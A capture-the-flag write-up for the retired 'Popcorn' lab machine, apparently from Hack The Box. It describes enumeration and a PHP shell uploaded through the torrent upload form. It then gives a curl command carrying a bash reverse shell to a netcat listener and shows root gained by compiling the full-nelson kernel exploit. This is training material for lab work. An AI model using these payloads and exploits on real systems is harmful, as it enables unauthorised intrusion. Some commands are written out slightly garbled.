Popcorn Write Up


Retired Medium Machine by ch4p


  1. Nmap
  2. gobuster / dirb / dirbuster
  3. Burp Suite Community Edition / OWASP ZAP
  4. NetCat
  5. linux-exploit-suggester.sh /SearchExploit (OFFSEC exploitDB) / Google


  1. Nmap with nmap -A gives two open ports, port 22 for ssh and 80 for http.
  2. On port 80 running gobuster with gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40 gives some links as output. Output shows some links, /test, /index, /torrent etc.
  3. /test page shows phpinfo allowed file upload.
  4. On /torrent page we can see sign up and log in option.


  1. After loggin in we can use the upload option. During uploading torrent file, we can modify filename and filecontent to php shell code with burp suite or OWASP ZAP. Burp
  2. We can goto /torrent/upload directory to get our file and simple curl will execute command on the server.
  3. Running netcat client on host with nc -lvnp 1337 and command curl --data-urlencode "test=bash -c 'bash -i >& /dev/tcp/ 0>&1'" will give us shell as user www-data.
  4. Now we can simply get user.txt as www-data for user george with command cat /home/george/user.txt.
      www-data@popcorn: ls /home
      www-data@popcorn: cat /home/george/user.txt

Priviledge Escalation

  1. After importing linux-exploit-suggester.sh we can get a lot of priviledge escalation exploits. linux-exploit-suggester
  2. One of them is full-nelson (http://vulnfactory.org/exploits/full-nelson.c). After importing it to the machine, we can compile it with gcc full-nelson.c -o full-nelson.
  3. Then We get root and root flag.
      www-data@popcorn:tmp$ gcc full-nelson.c - exploit
      gcc full-nelson.c - exploit
      www-data@popcorn:tmp$ chmod +x exploit
      chmod +x exploit
      www-data@popcorn:tmp$ ./exploit
      www-data@popcorn:tmp$ ./exploit
      www-data@popcorn:tmp$ ./exploit
      uid=0(root) gid=0(root)
      cat /root/root.txt
  4. Also dirtycow, motd and many other exploits are possible. As the server kernel version is too old.

Author: Zishan Ahamed Thandar